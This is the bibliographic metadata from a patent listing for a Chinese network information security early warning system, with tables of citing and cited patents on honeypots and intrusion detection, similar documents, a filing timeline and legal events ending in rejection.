CN (1) | CN108366088A (en) |
Cited By (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN109495470A (en) * | 2018-11-12 | 2019-03-19 | 常熟理工学院 | A kind of network information risk safe early warning method and server and system |
CN111385308A (en) * | 2020-03-19 | 2020-07-07 | 上海沪景信息科技有限公司 | Security management method, device, equipment and computer readable storage medium |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101567887A (en) * | 2008-12-25 | 2009-10-28 | 中国人民解放军总参谋部第五十四研究所 | Vulnerability simulation overload honeypot method |
CN102685147A (en) * | 2012-05-31 | 2012-09-19 | 东南大学 | Mobile communication honeypot capturing system and implementation method thereof |
CN102790778A (en) * | 2012-08-22 | 2012-11-21 | 常州大学 | DDos (distributed denial of service) attack defensive system based on network trap |
CN103561004A (en) * | 2013-10-22 | 2014-02-05 | 西安交通大学 | Cooperative type active defense system based on honey nets |
US20140359708A1 (en) * | 2013-06-01 | 2014-12-04 | General Electric Company | Honeyport active network security |
CN105282170A (en) * | 2015-11-04 | 2016-01-27 | 国网山东省电力公司电力科学研究院 | Information security offense and defense drill competition system for power industry |
Timeline
- 2017-12-28: application CN201711466279.2A filed (publication CN108366088A), status Pending
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US20190260793A1 (en) | Multidimensional clustering analysis and visualizing that clustered analysis on a user interface | |
CN102594620B (en) | Linkable distributed network intrusion detection method based on behavior description | |
CN112651006A (en) | Power grid security situation perception platform framework | |
Singh et al. | Collaborative ids framework for cloud | |
CN109587125B (en) | Network security big data analysis method, system and related device | |
CN118353702B (en) | Network information safety protection system | |
CN106656991A (en) | Network threat detection system and detection method | |
CN104852927A (en) | Safety comprehensive management system based on multi-source heterogeneous information | |
CN112511351B (en) | Security situation prediction method and system based on MES identification data intercommunication system | |
CN112560029A (en) | Website content monitoring and automatic response protection method based on intelligent analysis technology | |
CN113642023A (en) | Data security detection model training method, data security detection device and equipment | |
CN113240116B (en) | Wisdom fire prevention cloud system based on class brain platform | |
CN110855506A (en) | Safety situation monitoring method and system | |
CN106130762A (en) | A kind of network training comprehensive analysis method based on finite automaton | |
Pan et al. | Anomaly based intrusion detection for building automation and control networks | |
CN106209902A (en) | A kind of network safety system being applied to intellectual property operation platform and detection method | |
CN109150869A (en) | A kind of exchanger information acquisition analysis system and method | |
CN115001934A (en) | Industrial control safety risk analysis system and method | |
CN107547228A (en) | A kind of safe operation management platform based on big data realizes framework | |
CN111698209A (en) | Network abnormal flow detection method and device | |
CN108366088A (en) | A kind of information security early warning system for Instructing network | |
CN110149303B (en) | Party-school network security early warning method and early warning system | |
CN114374530A (en) | IDS system and detection method based on real-time network traffic monitoring and analysis | |
CN111490976B (en) | Dynamic baseline management and monitoring method for industrial control network | |
CN113132370A (en) | Universal integrated safety pipe center system |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
| PB01 | Publication | Application publication date: 2018-08-03 |
| SE01 | Entry into force of request for substantive examination | |
| RJ01 | Rejection of invention patent application after publication | |